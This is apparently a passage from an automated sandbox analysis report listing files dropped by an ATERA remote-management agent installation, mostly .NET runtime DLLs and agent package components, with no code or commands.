                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Emit.ILGeneration.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA259.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.ModelsV3.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Resources.Reader.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ObjectModel.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Extensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Win32.TaskScheduler.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.Encoding.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.WebSockets.Client.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.Utils.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Extensions.Hosting.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Memory.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.CoreLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Buffers.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIBB92.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.XPath.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.X509Certificates.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Dapper.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Console.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.SecureString.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\IdleTimeFinder.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\fr\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.Win32.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.Xml.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.Cng.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIDBCF.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Polly.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Numerics.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\clist.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Debug.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Collections.Immutable.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 4c999a.rbf (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Tracing.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscordaccore.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.Text.Encodings.Web.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Xml.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Linq.Parallel.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Globalization.Calendars.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XmlSerializer.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\CommunityToolkit.WinUI.Notifications.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Ping.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Microsoft.Win32.TaskScheduler.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Windows.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSID8C1.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.ModelsV3.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Pipes.AccessControl.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIBC4E.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSID8C1.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\de\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cuninst.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Polly.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7z.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.AppContext.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.MemoryMappedFiles.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.RegularExpressions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.TraceSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\RunScriptAsUser.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\System.Management.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Channels.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.Watcher.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.AccessControl.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net6.0\System.ServiceProcess.ServiceController.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Extensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\NLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\x86\SQLite.Interop.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Linq.Queryable.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.SecureString.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\x86\SQLite.Interop.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.EnvironmentVariables.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Numerics.Vectors.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Memory.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.StackTrace.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.EventBasedAsync.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSID8C1.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\coreclr.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Atera.AgentPackages.CommonLib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Emit.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\LiteDB.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Options.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Transactions.Local.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Tools.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\ru\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI9B15.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Thread.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Formats.Asn1.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.XmlSerializer.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.StackTrace.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Compression.FileSystem.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1CA.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI9B15.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.NonGeneric.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Overlapped.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\CliWrap.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIB4E8.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Collections.NonGeneric.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebSockets.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Globalization.Extensions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Transactions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.UnmanagedMemoryStream.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Binder.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.ThreadPool.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.IsolatedStorage.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\createdump.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6E49.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\UserDetections.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\msquic.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI3FD.tmpJump to dropped file
